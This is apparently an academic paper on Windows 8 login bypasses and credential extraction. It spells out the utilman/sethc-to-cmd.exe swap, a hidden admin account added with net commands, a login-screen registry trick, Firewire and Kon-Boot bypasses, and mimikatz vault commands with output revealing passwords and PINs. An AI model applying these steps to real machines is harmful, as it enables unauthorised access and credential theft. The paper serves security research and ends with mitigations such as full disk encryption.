  • 7. Vulnerabilities in login authentication methods and password storage in Windows 8 · 7 first demonstrated using a modified iPod running Linux and a script called win- lockpwn in 2008 [Spylogic 2008]. Either the iPod-Linux or the winlockpwn tool are updated anymore, but thanks to Carsten Maartmann-Moe, a new tool called Inception was released in 2011[Maartmann-Moe 2011], based on winlockpwn. Most new computers today don’t have a firewire port, but for an adversary, in many cases this is not a problem. Firewire ports can be bought as PCMCIA cards, and when these are inserted into the computer’s PCMCIA port, the drivers will be installed by them self, even if the computer is locked. An interesting thing here is that the Firewire attack can also be used when the harddisk in the computer is encrypted with for example BitLocker, if the computer is not shut down, but only locked. As another site note, Inceptioon is also able to bypass password on Apple OS X and Ubuntu. Utilman bypass This again is a very old and quite known trick, and it actually have been recom- mended by Microsoft to use this technique to bypass a forgotten password. This technique was possible already in Windows 2000, so why this is still possible in Windows 8.1, is a mystery. This technique takes advantage of a utility called Util- man, which is used for the accessibility features magnifier, narrator and on-Screen Keyboard. This utility is available at the login screen in all newer Windows version, and can be opened by pressing the Windows button together with the letter U. The problem with this, is that if the system is booted with for example a Linux Live-CD, and the adversary can access the files on the harddisk, he can remove or change the name of the file ”utilman.exe”, which is located in %systemroot%system32, and then copy ”cmd.exe” to ”utilman.exe”. When the system then is rebooted, and the login screen once again appear, the adversary can press Win+U, and a command prompt window running with system privileges will pop-up. See Figure 3. The file ”sethc.exe”, which also is located in %systemroot%system32, can be exploited in a very similar way. This file is used for the ”Sticky keys” feature of Windows, and it will run if the user presses the ”shift” key five times in a row. If cmd.exe is copied to sethc.exe, and the ”shift” key is pressed five times at the login screen, the command prompt will again pop-up. [Dieterle 2014]. If a command prompt isn’t good enough for the adversary, he can add users, change passwords, delete users and so on using Windows’ net commands, since the prompt shell is running as a ”system” user. For example create a user with netuser/addevilhacker∗ /foot- noteThe * will ask the user to set the password and add it to the ”administrator” group with netlocalgroupadministrators/addevilhacker. Login screensaver Another not so known trick, which works for Windows 7 and Windows 8.x, and is in a way related to the utilman.exe bypass is to enable a screensaver at the login screen, but instead of a screensaver for example cmd.exe is opened. This can be done by adding the following REG SZ values to the registry key HKEY USERS .Default ControlPanel Desktop [Superuser 2012]: SCRNSAVE.EXE = C: WINDOWSSYSTEM32LOGON.SCR ScreenSaveActive = 1
  • 8. Vulnerabilities in login authentication methods and password storage in Windows 8 · 8 ScreenSaveIsSecure = 0 ScreenSaveTimeOut = 10 (time before screensaver starts in seconds) Then, at the login screen, after for example 10 seconds, the cmd.exe windows will pop up with system privileges. Now, let us finish the old stuff, and cough up something new(ish). 4. PRESENTING: WINDOWS 8 Finally, the the essentials of this paper. Login authentication methods that are new in Windows 8. Starting with some background material about the ”root of all evil”, the Data Protection Application Programming Interface and Windows Vault and the Windows Vault. 4.1 Data Protection Application Programming Interface and Windows Vault First a little about the DPAPI, which is very difficult to find some official infor- mation about. Books like ”Windows Internal”, which is most cases answers almost anything about the internals of Windows, doesn’t contain any information about the Windows Vault and the Data Protection Application Programming Interface (DPAPI). The only information available from Microsoft is the public interface to DPAPI, no internal details are published. Can it be because of the serious vulner- abilities in these features of Windows? Although there have been multiple tries on reverse engineering the The best source is from the Russian company ”Passcape” [Passcape 2012a], and the paper ”Recovering Windows Secrets and EFS Certifi- cates Offline” [Burzstein and Picod 2010] by Elie Burztein et.al, which presents a complete reverse engineering project of DPAPI. Together with this paper, Burztein et.al. also released an application called DPAPick, which can be used to decrypt offline DPAPI secrets. This paper is highly recommended if the reader wants to learn the detailed internals of DPAPI. From Windows 2000, Microsoft included a special data protection interface, called Data Protection Application Programming Interface, DPAPI for short. This inter- face is used for easy store sensitive data on a disk under Windows. And currently DPAPI is used in many Windows applications and subsystems, and handling tasks like the file encryption system, wireless network key storage, Internet Explorer, Outlook, Skype, Credential Manger, Microsoft Vault and so on. Each encrypted unit is called a ”blob”. The DPAPI is considered very easy to use for encryption (CryptProtectData) and decryption (CryptUnprotectData) of data, and therefore very popular among programmers. The Russian company Passcape was the first to release software capable of decrypting and extracting data which had been en- crypted with DPAPI on a live system. In theory, DPAPI sounds very secure. It uses highly known and proven cryp- tographic algorithms. Windows 7 for example uses AES256 encryption in CBC mode, SHA512 for hashing, and PBKDF2 as password-based key derivation rou- tine. There is no available information of the cryptographic algorithms used in Windows 8.x, but we can assume they are the same as in Windows 7. This sounds secure, but there are vulnerabilities. The operating system need to be able to read data from the DPAPI, without any dialogue with the user. Therefore the keys to decrypt the DPAPI is placed in so the keys must be in memory, after they are decrypted of a master key file. This is what tools like the ones from Passcape, and
  • 9. Vulnerabilities in login authentication methods and password storage in Windows 8 · 9 mimikatz uses to extract login passwords from a running system with Windows, which will be discussed in the following sections. Up until Windows 8, it was only possible to extract data about the currently logged in user on the actual system using DPAPI. With DPAPI-NG in Windows 8, it is possible to decrypt and extract data from all users, and even if the files used by DPAPI is extracted and imported into another system. As mentioned, Windows Vault uses DPAPI to encrypt and store passwords used by applications in Windows and by Windows itself. Windows Vault was introduced in Windows 7, as a replacement to Credential Manager which was in use in earlier version of Windows. The Windows Vault is what is used by the PIN, Picture password, and fingerprint login authentication. 4.2 PIN codes and it’s vulnerabilities The main thing to be worried about when it comes to PIN codes as login authenti- cation in Windows 8, is that Microsoft only give you the option to use four digits. This reduces the keyspace drastically, and if human choose the passwords, there is a pretty big chance it will be relatively easy to guess. Especially if he adversary have some knowledge about the victim. One can wonder why on earth Microsoft limited PIN codes to four digits. There have been significant research done on the security on PIN codes. Researching the statistics of PIN codes extracted from password leaks like the one from RockYou, mentioned earlier, have ended up in some interesting facts about PIN codes. Research have been done among others by Joseph Bonneau et.al. at the Cambridge University [Bonneau et al. 2012], and the company Datagentics [DataGenetics 2012]. Below is a table showing the 20 most used PIN codes, from a statistical analysis done on 3,400,000 PIN codes by Datagentics in 2012 [DataGenetics 2012] Nr PIN Frequency 1 1234 10.713% 2 1111 6.016% 3 0000 1.881% 4 1212 1.197% 5 7777 0.745% 6 1004 0.616% 7 2000 0.613% 8 4444 0.526% 9 2222 0.516% 10 6969 0.512% 11 9999 0.451% 12 3333 0.419% 13 5555 0.395% 14 6666 0.391% 15 1122 0.366% 16 1313 0.304% 17 8888 0.303% 18 4321 0.293% 19 2001 0.290% 20 1010 0.285%
  • 10. Vulnerabilities in login authentication methods and password storage in Windows 8 · 10 Enough about general PIN code vulnerabilities. The rest of this section actually apply not only to the use of PIN codes in Windows 8, it also applies to Picture password and in some degree to the fingerprint login. It is discussed in this section, because this papers handles PIN codes first. Information and vulnerabilities that only applies to picture passwords and fingerprints, are discussed in later sections. In 2012 it became publicly known that Windows 8 stores login passwords in an easily recoverable way when PIN or picture password is in use. This is because they are stored in the Windows Vault, which uses DPAPI, which was discussed earlier in this paper. Using a tool from Passcode it was possible to easily extract them users passwords in clear-text [Passcape 2012c]. On the 8th of January 2014, I came in contact with Benjamin Delpy aka ”gentilkiwi” on Twitter, the man behind the open-source tool mimikatz, and asked him questions on how this was done. A few hours later he had included this in his tool and included this feature in mimikatz. Some days later Mr Delpy published a post on his blog describing how this was done [Delpy 2014e]. The extraction of both the regular password, PIN code, and picture password coordinates using mimikatz are shown below. Running mimikatz privilege::debug token::elevate vault::list exit Note that some non-interesting lines are removed from the output to save space in this paper. .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" .## ^ ##. (Mar 2 2014 22:44:55) ## / ## /* * * ## / ## Benjamin DELPY ‘gentilkiwi ‘ ( benjamin@gentilkiwi .com ) ’## v ##’ http :// blog.gentilkiwi.com/mimikatz (oe.eo) ’#####’ with 14 modules * * */ mimikatz(commandline) # privilege :: debug Privilege ’20’ OK mimikatz(commandline) # token :: elevate Token Id : 0 User name : SID name : NT AUTHORITYSYSTEM <snip > .... <snip > mimikatz(commandline) # vault :: list Vault : {4 bf4c442 -9b8a -41a0 -b380 -dd4a704ddb28} <snip > .... <snip > 0. Picture Password Credential <snip > .... <snip >
  • 11. Vulnerabilities in login authentication methods and password storage in Windows 8 · 11 *** Picture Password *** User : venueJohn Doe Password : Password00 Picture password (grid is 150*100) [0] line (x = 17 ; y = 5) -> (x = 33 ; y = 65) [1] point (x = 70 ; y = 21) [2] point (x = 80 ; y = 20) 1.PIN Logon Credential <snip > .... <snip > *** Pin Logon *** User : venueJohn Doe Password : Password00 PIN Code : 2580 2.PIN Logon Credential <snip > .... <snip > *** Pin Logon *** User : venueJane Doe Password : TopSecret123! PIN Code : 1234 <snip > .... <snip > When combining mimikatz with Kon-Boot, which was mentioned earlier, it is possible to bypass login authentication, and extract login credentials for all users of the system. This is also valid when the computer and user is members of a domain in Active Directory. So even the adversary doesn’t get access to domain resources when using authentication bypass tools like Kon-Boot or the Inception Firewire attack, he can compromise a domain account with the following steps: (1) Bypass authentication with for example Kon-Boot or Inception (2) Extract passwords from the Vault using mimikatz (3) Reboot computer (4) Log in with valid credentials obtained in previous steps (5) Jackpot! The adversary have access to the victims domain resources It is also very interesting to know that password vault is global, so once logged in to a system as an administrator, the user can extract login credentials for all users of the system. Instead of bypassing the login with tools like Kon-Boot, mimikatz can also be run in the system privileged cmd.exe from the ”Utilman authentication bypass” attack, as shown in figure 3.
  • 12. Vulnerabilities in login authentication methods and password storage in Windows 8 · 12 Fig. 2. cmd.exe running as utilman.exe on the Windows 8.1 login screen 4.3 Picture password and it’s vulnerabilities Picture passwords is a new login authentication method in Windows 8, based on the gesture authentication previously in use both on Android and iOS devices with touchscreen. The way this method works is that the user defines three gestures, used for authentication. The three gestures can either be a single point, a circle or a line, on a 100 by 150 grid. In the mimikatz output in the above section about PIN codes, the coordinates for the different gestures on the picture in 3 are shown. The line (1) goes from top to bottom of The Terminator’s shotgun, the first dot (2) is the left glass of his sunglasses, and the second dot (3) is the right glass. If Microsoft fix these issues, the picture password methods looks very promis- ing, with a high number of possible combinations, and easy to use on touchscreen devices. As mentioned under the section about PINs, the vault-attack is the same when using a picture password. Also, there exists a couple of not so technical attacks on touch screen devices, both for PIN and picture password. The Smudge attack is a method to find the gesture pattern used to unlock touchscreen devices using this form of authentication. This attack relies on detecting the smudge, left on the screen from grease from the users fingers. Using proper lighting, camera settings and image processing software, both a gesture and a PIN code can, in many cases, be recovered. This attack was
  • 13. Vulnerabilities in login authentication methods and password storage in Windows 8 · 13 Fig. 3. The picture password login screen, with coordinates. first made publicly known by a research team from the University of Pennsylvania, at the 4th USENIX conference on Offensive technologies [Aviv et al. 2010]. The smudge attack is in many ways similar to number keypads that have some numbers more worn than others, which in many cases can make it possible for an adversary to see commonly used digits. Another vulnerability both PIN codes and picture passwords might be more exposed to is shoulder surfing [Long and Mitnick 2011], since it is much easier to see the gesture on a picture, than the characters typed on a keyboard. 4.4 Fingerprints and it’s vulnerabilities From Windows 8.1, Windows got native support for fingerprint login authentication [Microsoft 2013]. Knowing this, and how PIN and Picture password function stores its credentials, I was curious on how this was done with fingerprints. Not able to find any information about this, I once again asked Benjamin Delpy on the 20th January. The 23th, he also had implemented this in mimikatz [Delpy 2014f]. It turns out that, as suspected, the fingerprint login, stores its information in the same way as PIN and picture password, in the Vault. And therefore, it is also possible to extract the login passwords when fingerprint is in use. When having more knowledge on the subject, I was able to find that Passcode already implemented this in their commercial ”Windows Vault Explorer” in 2012 [Passcape 2012b]. In addition, off course the fingerprint authentication in Windows is vulnerable to all the classical attacks on fingerprint readers, like for example fingerprint printed on a paper, latex fingers etc. This can be seen in for example the Discovery Channel show Mythbusters episode 59 ”Crimes and Myth-Demeanors 2” [Mythbusters 2006].
  • 14. Vulnerabilities in login authentication methods and password storage in Windows 8 · 14 4.5 Multi-factor login authentication and it’s vulnerabilities On the 23.February, Benjamin Delpy once again proved his skills, and released a new feature in his mimikatz. It was now possible to extract the the PIN code used when a smart card is used instead of a password for authentication as Windows login [Delpy 2014c]. According to Mr Delpy, this is valid when the native Windows support for smartcards are used. Because of the lack of equipment to test the extraction of PIN codes, this have not been experimented with for this paper. There haven’t been released much information about this attack yet, so there isn’t much information about how it is done publicly available, but it can be assumed it works very similar to the extraction of password when PIN and picture password is used, see Figure 4. Fig. 4. A smartcards PIN code extracted with the use of mimikatz [Delpy 2014c] 5. CONCLUSION Many of the attacks mentioned in this paper is like they are from a Hollywood spy movie, but this is the reality. Microsoft have some strange vulnerabilities in their login authentication, which there is no simple explanation for why they still are there. Both myself and others have tried to get in touch with the Microsoft security team, to get answers on why these techniques are still possible, but with not luck. People that are into computer security, like probably the reader if this paper is, tend to be aware of the risks to their computer, but the average man does not think of this. One of the most important security measurements for computers and other computer-like devices, is the use of Full Disk Encryption (FDE). This will pre- vent an adversary to access data on the computers harddisk, and in that also prevent an adversary to bypass the login to the operating system. From Windows 7, Microsoft included a FDE method called BitLocker, which is very easy to set up, and simple to use. The user of the computer will not notice the existence of
  • 15. Vulnerabilities in login authentication methods and password storage in Windows 8 · 15 BitLocker, except by a very slight decrease in performance [Hardware 2010]. If FDE is not an options, of some reason, security measures like for example BIOS password or harddisk passwords can also be used. BIOS password does not prevent an adversary from removing the harddisk out of a computer, and retrieve either the password hashes from the SAM file, or the Windows Vault from the vault files. What it prevents is for example the use of tools like Kon-Boot, or some other live- CDs/DVDs/pendrives capable of either reset passwords or extract hashes, when the adversary isn’t able to remove the disk. Harddisk password, also known as ATA-passwords, is something for itself. It is by some company policies considered just as good as FDE, but this is not disc encryption, it is just using a part of the ATA standard for harddisks, and it does in many cases exist a master password, which overwrites the one set by the user [ISEE0XDEADDISKS 2008]. Firewire attacks bypasses all protection of the harddisk, if a user have locked a logged in system. To mitigate this, the Firewire and/or PCMCIA port must be disabled in a way, or automatic PCMCIA driver installation should be disabled. The final conclusion to this paper must be, never leave you computer unattended! REFERENCES Amazon. 2014. Amazon ec2 pricing. http://aws.amazon.com/ec2/pricing/. Accessed : 21.feb.2014. Amplia. 2013. Winows credential manager. http://www.ampliasecurity.com/research/windows- credentials-editor/. Accessed : 6.mar.2014. Aviv, A. J., Gibson, K., Mossop, E., Blaze, M., and Smith, J. M. 2010. Smudge attacks on smartphone touch screens. In Proceedings of the 4th USENIX conference on Offensive technologies. USENIX Association, 1–7. Bonneau, J., Preibusch, S., and Anderson, R. 2012. A birthday present every eleven wallets? the security of customer-chosen banking pins. In Financial Cryptography and Data Security. Springer, 25–40. Burzstein, E. and Picod, J. M. 2010. Recovering windows secrets and efs certificates offline. In Proc. of the 4th USENIX Conference on Offensive Technologies. Berkeley, USA: USENIX Association. DataGenetics. 2012. Pin analysis. http://www.datagenetics.com/blog/september32012/. Ac- cessed : 7.jan.2014. Delpy, B. 2011. Re – pass the pass. http://blog.gentilkiwi.com/securite/re-pass-the-pass. Ac- cessed : 24.feb.2014. Delpy, B. 2012. Re - re – pass the pass. http://blog.gentilkiwi.com/securite/rere-pass-the-pass. Accessed : 24.feb.2014. Delpy, B. 2014a. Blog de gentil kiwi. http://blog.gentilkiwi.com. Accessed : 21.feb.2014. Delpy, B. 2014b. mimikatz. http://blog.gentilkiwi.com/mimikatz. Accessed : 17.jan.2014. Delpy, B. 2014c. mimikatz can now extract *pin code* of smartcards associated with lo- gon sessions. https://twitter.com/gentilkiwi/status/437719635404673025/photo/1. Accessed : 26.feb.2014. Delpy, B. 2014d. Pass the pass. http://blog.gentilkiwi.com/securite/pass-the-pass. Accessed : 24.feb.2014. Delpy, B. 2014e. Windows 8, code pin et mot de passe image. http://blog.gentilkiwi.com/securite/mimikatz/windows-8-code-pin-mot-de-passe-image. Ac- cessed : 23.jan.2014. Delpy, B. 2014f. Windows 8, empreintes digitales. http://blog.gentilkiwi.com/securite/mimikatz/windows-8-empreintes-digitales. Accessed : 24.jan.2014. Dieterle, D. W. 2014. Basic Security Testing with Kali Linux, 1 ed. CreateSpace Independent Publishing Platform.
  • 16. Vulnerabilities in login authentication methods and password storage in Windows 8 · 16 Falde, K. 2013. Restricted admin mode for rdp in windows 8.1 2012 r2. http://blogs.technet.com/b/kfalde/archive/2013/08/14/restricted-admin-mode-for-rdp-in- windows-8-1-2012-r2.aspx. Accessed : 18.feb.2014. Freerainbowtables. 2014. Rainbow tables available. https://www.freerainbowtables.com/en/tables2/. Accessed : 26.feb.2014. Griffin, D. 2007. Create custom login experiences with credential providers for windows vista. http://msdn.microsoft.com/en-us/magazine/cc163489.aspx. Accessed : 24.feb.2014. Hagen, P. N. 2014. Offline nt password and registry editor. http://pogostick.net/ pnh/ntpasswd/. Accessed : 23.feb.2014. Hardware, T. 2010. System encryption: Bitlocker and truecrypt compared. http://www.tomshardware.com/reviews/bitlocker-truecrypt-encryption,2587-9.html. Ac- cessed : 24.jan.2014. ISEE0XDEADDISKS. 2008. List of hard disk ata master passwords. http://ipv5.wordpress.com/2008/04/14/list-of-hard-disk-ata-master-passwords/. Accessed : 21.feb.2014. Long, J. and Mitnick, K. 2011. No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing. Elsevier Science. Lowe, M. 2013. New r̈estricted adminf̈eature of rdp 8.1 allows pass-the-hash. https://labs.portcullis.co.uk/blog/new-restricted-admin-feature-of-rdp-8-1-allows-pass-the- hash/. Accessed : 18.feb.2014. Maartmann-Moe, C. 2011. Inception. http://www.breaknenter.org/projects/inception/. Ac- cessed : 18.feb.2014. McClure, S., Scambray, J., Kurtz, G., and Kurtz. 2009. Hacking exposed: network security secrets and solutions. McGraw-Hill. Microsoft. 2013. What’s new in biometrics in windows 8.1. http://technet.microsoft.com/library/dn344916.aspx. Accessed : 24.jan.2014. Microsoft. 20xx. Msv1 0 authentication package. http://msdn.microsoft.com/en- us/library/windows/desktop/aa378753(v=vs.85).aspx. Accessed : 24.feb.2014. Mythbusters. 2006. Fingerprint scanners are unbeatable. http://www.discovery.com/tv- shows/mythbusters/mythbusters-database/fingerprint-scanners-unbeatable.htm. Accessed : 18.feb.2014. Passcape. 2011’. Lsa secrets in windows. http://www.passcape.com/index.php?setLang=2&section=blog&cmd=details&id=15. Ac- cessed : 21.feb.2014. Passcape. 2012a. Dpapi secrets. security analysis and data recovery in dpapi (part 1). http://www.passcape.com/index.php?section=blog&cmd=details&id=20. Accessed : 21.feb.2014. Passcape. 2012b. Security breach in windows 7 and windows 8 biometric authentica- tion. http://www.passcape.com/index.php?section=blog&cmd=details&id=31. Accessed : 23.jan.2014. Passcape. 2012c. Windows 8 stores logon passwords in plain-text. http://www.passcape.com/index.php?section=blog&cmd=details&id=27. Accessed : 7.jan.2014. Passcape. 2014. Passcape. http://www.passcape.com. Accessed : 21.feb.2014. Pilkington, M. 2012. Protecting privileged domain accounts: Disabling encrypted passwords. http://digital-forensics.sans.org/blog/2012/03/09/protecting-privileged-domain- accounts-disabling-encrypted-passwords. Accessed : 24.feb.2014. Rapid7. 2011. Microsoft windows authenticated administration utility. http://www.rapid7.com/db/modules/auxiliary/admin/smb/psexec command. Accessed : 18.feb.2014. Ronin. 2014. Passing the hash with remote. http://www.kali.org/penetration-testing/passing- hash-remote-desktop/. Accessed : 18.feb.2014. Skullsecurity. 2011. Passwords. https://wiki.skullsecurity.org/Passwords. Accessed : 21.feb.2014.
  • 17. Vulnerabilities in login authentication methods and password storage in Windows 8 · 17 Spylogic. 2008. What is digest authentication? http://www.spylogic.net/2008/05/winlockpwn- more-then-a-partytrick/. Accessed : 20.feb.2014. Superuser. 2012. How to get a screensaver at the windows 7 login screen? http://superuser.com/questions/107200/how-to-get-a-screensaver-at-the-windows-7-login- screen. Accessed : 26.feb.2014. thelead82. 2013. Kon-boot for windows. http://www.thelead82.com/products-win.html. Ac- cessed : 17.jan.2014. Wolthusen, S. D. 2014. Lecture slides imt4541 foundations in information security. xkcd. 2013. Password strength. https://xkcd.com/936/. Accessed : 24.jan.2014. ZDNet. 2014. The history of windows: A timeline. http://www.zdnet.com/the-history-of- windows-a-timeline-7000025145/. Accessed : 18.feb.2014. Zhao, Z., Ahn, G.-J., Seo, J.-J., and Hu, H. 2013. On the security of picture gesture authen- tication. In Proceedings of the 22nd USENIX conference on Security. USENIX Association, 383–398.